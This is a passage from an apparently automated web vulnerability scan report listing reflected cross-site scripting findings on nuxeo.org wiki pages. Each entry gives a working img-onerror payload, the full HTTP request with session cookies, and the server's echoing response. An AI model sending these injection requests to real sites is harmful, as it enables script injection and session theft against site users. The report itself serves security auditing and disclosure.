Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main69a0c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec19e02784b/JCRMigration?format=xar&amp;name=Main69a0c"><img src=a onerror=alert(1)>c19e02784b.JCRMigration&amp;pages=Main69a0c">
...[SNIP]...

1.86. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 was submitted in the REST URL parameter 5. This input was echoed as 2dc44"><img src=a onerror=alert(1)>62e95f58fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigration2dc44"><img%20src%3da%20onerror%3dalert(1)>62e95f58fe5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/JCRMigration2dc44%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62e95f58fe5?format=xar&amp;name=Main.JCRMigration2dc44"><img src=a onerror=alert(1)>62e95f58fe5&amp;pages=Main.JCRMigration2dc44">
...[SNIP]...

1.87. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/JCRMigration

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 was submitted in the REST URL parameter 5. This input was echoed as d9d25<img src=a onerror=alert(1)>6e390cba6e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/JCRMigrationd9d25<img%20src%3da%20onerror%3dalert(1)>6e390cba6e2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigrationd9d25%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6e390cba6e2'>JCRMigrationd9d25<img src=a onerror=alert(1)>6e390cba6e2</a>
...[SNIP]...

1.88. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5 was submitted in the REST URL parameter 4. This input was echoed as 6f7d4"><img src=a onerror=alert(1)>d2d6af453d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f7d4"><img%20src%3da%20onerror%3dalert(1)>d2d6af453d5/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13149
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6f7d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2d6af453d5/Nuxeo+Testing+Framework?format=xar&amp;name=Main6f7d4"><img src=a onerror=alert(1)>d2d6af453d5.Nuxeo Testing Framework&amp;pages=Main6f7d4">
...[SNIP]...

1.89. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4 was submitted in the REST URL parameter 4. This input was echoed as 1e829<img src=a onerror=alert(1)>4dac70b73d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main1e829<img%20src%3da%20onerror%3dalert(1)>4dac70b73d4/Nuxeo+Testing+Framework HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main1e829%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4dac70b73d4/">Main1e829<img src=a onerror=alert(1)>4dac70b73d4</a>
...[SNIP]...

1.90. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 was submitted in the REST URL parameter 5. This input was echoed as fd33a<img src=a onerror=alert(1)>04410ba00e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a<img%20src%3da%20onerror%3dalert(1)>04410ba00e3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfd33a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E04410ba00e3'>Nuxeo Testing Frameworkfd33a<img src=a onerror=alert(1)>04410ba00e3</a>
...[SNIP]...

1.91. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Nuxeo+Testing+Framework

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 was submitted in the REST URL parameter 5. This input was echoed as fe512"><img src=a onerror=alert(1)>8ca69496434 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Nuxeo+Testing+Frameworkfe512"><img%20src%3da%20onerror%3dalert(1)>8ca69496434 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:10 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Nuxeo+Testing+Frameworkfe512%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8ca69496434?format=xar&amp;name=Main.Nuxeo Testing Frameworkfe512"><img src=a onerror=alert(1)>8ca69496434&amp;pages=Main.Nuxeo Testing Frameworkfe512">
...[SNIP]...

1.92. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0 was submitted in the REST URL parameter 4. This input was echoed as 3d601<img src=a onerror=alert(1)>573ef0b70f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main3d601<img%20src%3da%20onerror%3dalert(1)>573ef0b70f0/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13066
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main3d601%3Cimg+src%3Da+onerror%3Dalert%281%29%3E573ef0b70f0/">Main3d601<img src=a onerror=alert(1)>573ef0b70f0</a>
...[SNIP]...

1.93. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e was submitted in the REST URL parameter 4. This input was echoed as a4eff"><img src=a onerror=alert(1)>f1fa6463d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina4eff"><img%20src%3da%20onerror%3dalert(1)>f1fa6463d0e/NuxeoDevGettingStarted HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:46 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maina4eff%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1fa6463d0e/NuxeoDevGettingStarted?format=xar&amp;name=Maina4eff"><img src=a onerror=alert(1)>f1fa6463d0e.NuxeoDevGettingStarted&amp;pages=Maina4eff">
...[SNIP]...

1.94. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 was submitted in the REST URL parameter 5. This input was echoed as f7c6d<img src=a onerror=alert(1)>83bdae15118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E83bdae15118'>NuxeoDevGettingStartedf7c6d<img src=a onerror=alert(1)>83bdae15118</a>
...[SNIP]...

1.95. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoDevGettingStarted

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe was submitted in the REST URL parameter 5. This input was echoed as 3b0a6"><img src=a onerror=alert(1)>2f680be3ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoDevGettingStarted3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoDevGettingStarted3b0a6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E2f680be3ffe?format=xar&amp;name=Main.NuxeoDevGettingStarted3b0a6"><img src=a onerror=alert(1)>2f680be3ffe&amp;pages=Main.NuxeoDevGettingStarted3b0a6">
...[SNIP]...

1.96. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d was submitted in the REST URL parameter 4. This input was echoed as 6520f<img src=a onerror=alert(1)>b3521d0e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6520f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb3521d0e8d/">Main6520f<img src=a onerror=alert(1)>b3521d0e8d</a>
...[SNIP]...

1.97. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1 was submitted in the REST URL parameter 4. This input was echoed as b6ecb"><img src=a onerror=alert(1)>3570ded39b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
